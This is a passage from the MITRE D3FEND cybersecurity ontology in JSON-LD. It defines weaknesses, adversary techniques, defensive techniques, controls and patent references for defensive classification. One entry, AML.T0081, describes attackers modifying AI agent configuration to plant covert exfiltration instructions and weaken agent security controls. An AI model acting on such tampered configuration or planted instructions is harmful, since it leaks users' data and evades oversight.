      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:CWE-1221",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1221",
      "d3f:definition": "Hardware description language code incorrectly defines register defaults or hardware Intellectual Property (IP) parameters to insecure values.",
      "rdfs:label": "Incorrect Register Defaults or Module Parameters",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1052",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1052",
      "d3f:definition": "The product initializes a data element using a hard-coded literal that is not a simple integer or static constant element.",
      "rdfs:label": "Excessive Use of Hard-Coded Literals in Initialization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1419"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:Reference-SystemAndAMethodForIdentifyingThePresenceOfMalwareAndRansomwareUsingMini-trapsSetAtNetworkEndpoints_FidelisCybersecuritySolutionsInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9807115B2/en?oq=US-9807115-B2"
      },
      "d3f:kb-abstract": "A system for identifying the presence of ransomware on a network, including a plurality of resources, interconnected to form a network and at least one decoy drive.The decoy drive includes a plurality of decoy files to be encrypted by the ransomware, and wherein the decoy drive continuously provides the decoy files thereby continuously occupying the ransomware.",
      "d3f:kb-author": "Doron Kolton; Rami Mizrahi; Omer Zohar; Benny Ben-Rabi; Alex Barbalat; Shlomi Gabai",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Fidelis Cybersecurity Solutions Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints",
      "rdfs:label": "Reference - System and a method for identifying the presence of malware and ransomware using mini-traps set at network endpoints - Fidelis Cybersecurity Solutions Inc"
    },
    {
      "@id": "d3f:process-command-line-arguments",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x process-command-line-arguments y: The process x has the process command line arguments data y.",
      "rdfs:label": "process-command-line-arguments",
      "rdfs:subPropertyOf": {
        "@id": "d3f:process-data-property"
      }
    },
    {
      "@id": "d3f:T1070.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.007",
      "d3f:definition": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.",
      "rdfs:label": "Clear Network Connection History and Configurations",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:FirmwareEmbeddedMonitoringCode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FirmwareEmbeddedMonitoringCode"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Firmware"
      },
      "d3f:d3fend-id": "D3-FEMC",
      "d3f:definition": "Monitoring code is injected into firmware for integrity monitoring of firmware and firmware data.",
      "d3f:kb-article": "## How it works\nFirmware in deployed network devices is typically not monitored for malicious changes. This technique provides a method to embed a software security component into the deployed firmware which provides a near real-time monitoring hook. The exception handling code, in the firmware, is typically used to expose any detected vulnerabilities.\n\nThe injected software components provide a feature similar to intrusion detection systems for the firmware by detecting unauthorized modifications of the embedded firmware. The integrity of static code and firmware data are monitored continuously in the hosted devices. Comparisons are made to monitored elements like firmware memory addresses and data segments. Memory pages are scanned and if a modification is detected the software component may lock the page. This will protect subsequent attempted modifications to the firmware. The software component may utilize the exception handling code and thus be able to disclose the exact address of the modified memory.\n\nThe injected software components are inserted during the firmware imaging process. The injected software is assumed to have knowledge of both the embedded code and the current execution state of the host program. The injected software will monitor and alert, in near real-time, on potential suspicious activity. The injected code is run alongside of the embedded code in the host. The injected software operates as an independent entity and is not dependent on the host software.\n\nFinally, this technique may implement other countermeasure techniques as part of their analytical processes. These should be identified by referencing other countermeasure techniques directly as necessary.\n\n## Considerations\n* The firmware code will need to be modified and re-hosted on the device.\n* Exposing monitoring hooks to the injected code may introduce additional risk.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeRedBalloon"
        },
        {
          "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeSymbiotes"
        }
      ],
      "rdfs:label": "Firmware Embedded Monitoring Code",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N275450231dde48a1a5211ce37fd6f5dc"
        }
      ]
    },
    {
      "@id": "_:N275450231dde48a1a5211ce37fd6f5dc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:T1573.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1573.002",
      "d3f:creates": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "d3f:definition": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "rdfs:label": "Asymmetric Cryptography",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1573"
        },
        {
          "@id": "_:N436bd4f4efcd48aeb50789eca5a58ad4"
        },
        {
          "@id": "_:N813cd6b8d5f246b98c421274f0ce71b5"
        }
      ]
    },
    {
      "@id": "_:N436bd4f4efcd48aeb50789eca5a58ad4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "_:N813cd6b8d5f246b98c421274f0ce71b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "d3f:CWE-554",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-554",
      "d3f:definition": "The ASP.NET application does not use an input validation framework.",
      "rdfs:label": "ASP.NET Misconfiguration: Not Using Input Validation Framework",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:KerberosTicketGrantingTicketAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      },
      "d3f:definition": "KRBTGT is an account used by Key Distribution Center (KDC) service to issue Ticket Granting Tickets (TGTs) as part of the Kerberos authentication protocol.",
      "d3f:synonym": "krbtgt",
      "rdfs:label": "Kerberos Ticket Granting Ticket Account",
      "rdfs:seeAlso": {
        "@id": "https://blog.quest.com/what-is-krbtgt-and-why-should-you-change-the-password/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceAccount"
        },
        {
          "@id": "_:N59e92987ef9349409f47a448d72c4fda"
        }
      ]
    },
    {
      "@id": "_:N59e92987ef9349409f47a448d72c4fda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KerberosTicketGrantingTicket"
      }
    },
    {
      "@id": "d3f:Reference-MalwareDetectionInEventLoops_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190205530A1"
      },
      "d3f:kb-abstract": "Example techniques locate or identify malware based on events from or at monitored computing devices. A control unit can detect a sequence of events of various types. The control unit can locate a loop within the sequence of events based at least in part on relative frequencies of the event types. The control unit can determine a distribution of event types of the events within the loop, and determining that software running the sequence is associated with malware based at least in part on the distribution of event types within the loop. In some examples, the control unit can locate a point of commonality among a plurality of stack traces associated with respective events within the loop. The control unit can determine a malware module comprising the point of commonality.",
      "d3f:kb-author": "Daniel W. Brown",
      "d3f:kb-mitre-analysis": "The patent describes determining if a sequence of events associated with a process are associated with malware. Based on the relative frequency of events, a loop within a sequence of events is located and a distribution of the events within the loop is determined. The distribution of events is then compared against a catalog of distributions to determine if it is associated with malware.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Malware detection in event loops",
      "rdfs:label": "Reference - Malware detection in event loops - Crowdstrike Inc"
    },
    {
      "@id": "d3f:CWE-349",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-349",
      "d3f:definition": "The product, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted.",
      "rdfs:label": "Acceptance of Extraneous Untrusted Data With Trusted Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:ProximitySensorEvent",
      "@type": "owl:Class",
      "rdfs:label": "Proximity Sensor Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessAlarmEvent"
        },
        {
          "@id": "_:Nd4d800bb58794bc69faad94adcb9bfd4"
        }
      ]
    },
    {
      "@id": "_:Nd4d800bb58794bc69faad94adcb9bfd4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProximitySensor"
      }
    },
    {
      "@id": "d3f:OSAPIFreeMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that releases or deallocates memory that was previously allocated by the program.",
      "d3f:invokes": {
        "@id": "d3f:FreeMemory"
      },
      "rdfs:label": "OS API Free Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N8b4f23f4a2014ef5b32963ed89a8f30d"
        }
      ]
    },
    {
      "@id": "_:N8b4f23f4a2014ef5b32963ed89a8f30d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FreeMemory"
      }
    },
    {
      "@id": "d3f:T1543",
      "@type": "owl:Class",
      "d3f:attack-id": "T1543",
      "d3f:definition": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)",
      "rdfs:label": "Create or Modify System Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1602.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1602.001",
      "d3f:definition": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).",
      "rdfs:label": "SNMP (MIB Dump)",
      "rdfs:subClassOf": {
        "@id": "d3f:T1602"
      }
    },
    {
      "@id": "d3f:OTExceptionMessage",
      "@type": "owl:Class",
      "d3f:definition": "An unknown or anomalous condition occurred in the system.",
      "rdfs:comment": [
        "BACnet: Reject: 1\nBACnet: Reject: 2\nBACnet: Reject: 3\nBACnet: Reject: 4\nBACnet: Reject: 5\nBACnet: Reject: 6\nBACnet: Reject: 7\nBACnet: Reject: 8\nBACnet: Reject: 9\nBACnet: Reject: 10 ",
        "Modbus: Read Exception Status\nModbus: Exception: Illegal Function\nModbus: Exception: Illegal Data Address\nModbus: Exception: Illegal Data Value\nModbus: Exception: Slave Device Failure\nModbus: Exception: Acknowledge\nModbus: Exception: Slave Device Busy\nModbus: Exception: Memory Parity Error\nModbus: Exception: Gateway Path Unavailable\nModbus: Exception: Gateway Target Device Failed to Respond"
      ],
      "rdfs:label": "OT Exception Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:ProcessAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessAnalysis"
      ],
      "d3f:d3fend-id": "D3-PA",
      "d3f:definition": "Process Analysis consists of observing a running application process and analyzing it to watch for certain behaviors or conditions which may indicate adversary activity. Analysis can occur inside of the process or through a third-party monitoring application. Examples include monitoring system and privileged calls, monitoring process initiation chains, and memory boundary allocations.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Process Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N2c95e31f2b9c411eb24be5714099378e"
        }
      ]
    },
    {
      "@id": "_:N2c95e31f2b9c411eb24be5714099378e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:Range",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RAN",
      "d3f:definition": "The range of a set of data is the difference between the largest and smallest value.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Range (statistics). [Link](https://en.wikipedia.org/wiki/Range_(statistics))",
      "rdfs:label": "Range",
      "rdfs:subClassOf": {
        "@id": "d3f:Variability"
      }
    },
    {
      "@id": "d3f:TransferAgentAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:TransferAgentAuthentication"
      ],
      "d3f:d3fend-id": "D3-TAAN",
      "d3f:definition": "Validating that server components of a messaging infrastructure are authorized to send a particular message.",
      "d3f:kb-article": "## How it works\nTransfer Agent Authentication can be accomplished in different ways for depending on the protocol. In Email, Sender Policy Framework (SPF), Domain Key Identified Email (DKIM) or Domain-based Message Authentication Reporting and Conformance (DMARC) are used to validate sender domain ownership.\n\n### SPF\nSPF protocol allows for mail domain owners to specify the mail servers they use when sending email. SPF requires the use of SPF records published in the Domain Name System (DNS). The records record the authorized IPs for email senders. SPF uses the return-path address for domain IP identification. Email that is forwarded may cause the return-path validation problems.\n### DKIM\nDKIM also uses a record entry in DNS for authentication but does not rely on the simple return-path for validation. A signature header is added to email and encryption is used for security. This adds an additional layer of complexity and requires that DKIM servers be configured identified cryptographic signatures. The additional complexity results in a validation process that can survive complex routing of emails.\n\n### DMARC\nDMARC is an email policy and authentication protocol that seeks to ensure that the \"From\" field of emails is not spoofed. DMARC makes use of both SPF records and DKIM published key validation. DMARC also has a decision policy framework, contained in a DMARC record, for handling of rejected email. 
The DMARC framework also updates DMARC domains with authentication statues for allowed senders of that domain.\n\n## Considerations\n- Additional work is required to ensure that all SPF, DKIM and DMARC records are current and up to date.\n- Maintenance of DKIM signing keys is needed.\n- Using SPF without DKIM and DMARC verifies the Return-Path domain however does not prevent spoofing of the displayed From: address.\n- Parts of an email that are not signed or verified by email authentication methods, such as the message body or the header To: and Subject: fields, can be altered or modified.\n- Email message authentication does not replace the need to do email content analysis since executables, attachments, or links or other parts of the email beyond the sender domain are not verified.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DomainKeysIdentifiedMail-Signatures-IETF"
        },
        {
          "@id": "d3f:Reference-RFC7208-SenderPolicyFramework-SPF-ForAuthorizingUseOfDomainsInEmail-IETF"
        },
        {
          "@id": "d3f:Reference-RFC7489-Domain-basedMessageAuthentication-Reporting-AndConformance-DMARC"
        }
      ],
      "rdfs:label": "Transfer Agent Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:MessageHardening"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the removal of a registry key from the Windows Registry, including its hierarchical structure and associated metadata.",
      "rdfs:label": "Windows Registry Key Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryKeyEvent"
        },
        {
          "@id": "_:N1a1051210e0c4db7881c2acb211e6645"
        }
      ]
    },
    {
      "@id": "_:N1a1051210e0c4db7881c2acb211e6645",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKeyCreationEvent"
      }
    },
    {
      "@id": "d3f:BinarySegment",
      "@type": "owl:Class",
      "d3f:definition": "A binary segment is a partition of binary information within a larger binary object, which arranges a set of binary objects for its purpose.   For example, code, data, heap, and stack segments are segments of the binary information used by a process.  Code and data segments are also found in object files.",
      "rdfs:label": "Binary Segment",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CWE-286",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-286",
      "d3f:definition": "The product does not properly manage a user within its environment.",
      "rdfs:label": "Incorrect User Management",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CCI-001092_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects against or limits the effects of the organization-defined or referenced types of denial of service attacks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001092"
    },
    {
      "@id": "d3f:Transmitter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device or system that takes information and generates a signal suitable for propagation. It encodes and formats the content, impresses it on a physical carrier (such as electromagnetic fields, light, electrical currents, or acoustic waves), and performs signal conditioning—such as modulation, pulse shaping, pre-emphasis, and power amplification—to meet spectral, timing, and power requirements. A transmitter may be analog or digital, implemented in hardware, software, or both, and is designed to launch the signal into the chosen medium with characteristics that enable reliable reception.",
      "d3f:transmits": {
        "@id": "d3f:Signal"
      },
      "rdfs:label": "Transmitter",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Signal_transmission"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N499fd9bb571f43adb0a7ce7a25fbafc4"
        }
      ]
    },
    {
      "@id": "_:N499fd9bb571f43adb0a7ce7a25fbafc4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:transmits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:causes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x causes y: The event or action x brings about event or action y as a consequence.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.commoncoreontologies.org/ont00001803"
      },
      "rdfs:label": "causes",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1325",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1325",
      "d3f:definition": "The product manages a group of objects or resources and performs a separate memory allocation for each object, but it does not properly limit the total amount of memory that is consumed by all of the combined objects.",
      "d3f:synonym": "Stack Exhaustion",
      "rdfs:label": "Improperly Controlled Sequential Memory Allocation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-770"
      }
    },
    {
      "@id": "d3f:T1079",
      "@type": "owl:Class",
      "d3f:attack-id": "T1079",
      "d3f:definition": "An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1573",
      "rdfs:label": "Multilayer Encryption",
      "rdfs:seeAlso": {
        "@id": "d3f:T1573"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001133_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system terminates the network connection associated with a communications session at the end of the session or after an organization-defined time period of inactivity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SessionDurationAnalysis"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001133"
    },
    {
      "@id": "d3f:LogicalLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Logical Link is an abstract or virtual connection between two entities that facilitates communication or data exchange without requiring a direct physical connection.",
      "rdfs:label": "Logical Link",
      "rdfs:subClassOf": {
        "@id": "d3f:Link"
      }
    },
    {
      "@id": "d3f:Reference-DetectingDDoSAttackUsingSnort",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.researchgate.net/publication/338660054_DETECTING_DDoS_ATTACK_USING_Snort"
      },
      "d3f:kb-abstract": "A DDoS (Distributed Denial-of-Service) attack is very common and easy toexecute and does not require any sophisticated tools. It can happen to anyone. In this project we deploy snort in our home network as a NIDS (Network Intrusion Detection System) to detect a DDoS attack and prevent it.",
      "d3f:kb-author": "Manas Gogoi, Sourav Mishra",
      "d3f:kb-organization": "Indian Institute of Information Technology Allahabad",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "DETECTING DDoS ATTACK USING Snort",
      "rdfs:label": "Reference - Detecting DDoS Attack Using Snort"
    },
    {
      "@id": "d3f:T1546.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.006",
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.",
      "d3f:modifies": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "LC_LOAD_DYLIB Addition",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N27eddeef4d0748db806aa34708ead433"
        }
      ]
    },
    {
      "@id": "_:N27eddeef4d0748db806aa34708ead433",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:UserAccountMFAEnableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where multi-factor authentication (MFA) is enabled for a user account.",
      "rdfs:label": "User Account MFA Enable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:N62357ae9f86046669961dfa9222f0eeb"
        }
      ]
    },
    {
      "@id": "_:N62357ae9f86046669961dfa9222f0eeb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:CCI-000199_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces maximum password lifetime restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000199"
    },
    {
      "@id": "d3f:BootSector",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A boot record [boot sector] is the sector of a persistent data storage device (e.g., hard disk, floppy disk, optical disc, etc.) which contains machine code to be loaded into random-access memory (RAM) and then executed by a computer system's built-in firmware (e.g., the BIOS, Das U-Boot, etc.).",
      "rdfs:label": "Boot Sector",
      "rdfs:seeAlso": {
        "@id": "dbr:Boot_sector"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:BootRecord"
      }
    },
    {
      "@id": "d3f:AML.T0081",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0081",
      "d3f:definition": "Adversaries may modify the configuration files for AI agents on a system. This allows malicious changes to persist beyond the life of a single agent and affects any agents that share the configuration.\n\nConfiguration changes may include modifications to the system prompt, tampering with or replacing knowledge sources, modification to settings of connected tools, and more. Through those changes, an attacker could redirect outputs or tools to malicious services, embed covert instructions that exfiltrate data, or weaken security controls that normally restrict agent behavior.",
      "rdfs:label": "Modify AI Agent Configuration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0081"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "Modify AI Agent Configuration"
    },
    {
      "@id": "d3f:T0821",
      "@type": "owl:Class",
      "d3f:attack-id": "T0821",
      "d3f:definition": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller.",
      "rdfs:label": "Modify Controller Tasking - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Modify Controller Tasking"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AU-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Event Logging",
      "d3f:exactly": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AU-2"
    },
    {
      "@id": "d3f:OutboundInternetEncryptedTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet encrypted traffic is encrypted network traffic on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Encrypted Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:LongShort-termMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LSTM",
      "d3f:definition": "Unlike standard feedforward neural networks, LSTM has feedback connections. Such a recurrent neural network (RNN) can process not only single data points (such as images), but also entire sequences of data (such as speech or video). This characteristic makes LSTM networks ideal for processing and predicting data",
      "d3f:kb-article": "## References\nWikipedia. (2021, September 29). Long short-term memory. [Link](https://en.wikipedia.org/wiki/Long_short-term_memory)",
      "rdfs:label": "Long Short-term Memory",
      "rdfs:subClassOf": {
        "@id": "d3f:RecurrentNeuralNetwork"
      }
    },
    {
      "@id": "d3f:EvictionEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event describing actions to remove adversaries or malicious resources from a system, re-establishing security and operational integrity.",
      "d3f:related": {
        "@id": "d3f:Evict"
      },
      "rdfs:label": "Eviction Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SecurityEvent"
        },
        {
          "@id": "_:Na5e90e3b27c84dc28973b5c44708de1f"
        }
      ]
    },
    {
      "@id": "_:Na5e90e3b27c84dc28973b5c44708de1f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DetectionEvent"
      }
    },
    {
      "@id": "d3f:CCI-002041_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system allows the use of a temporary password for system logons with an immediate change to a permanent password.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002041"
    },
    {
      "@id": "d3f:CWE-340",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-340",
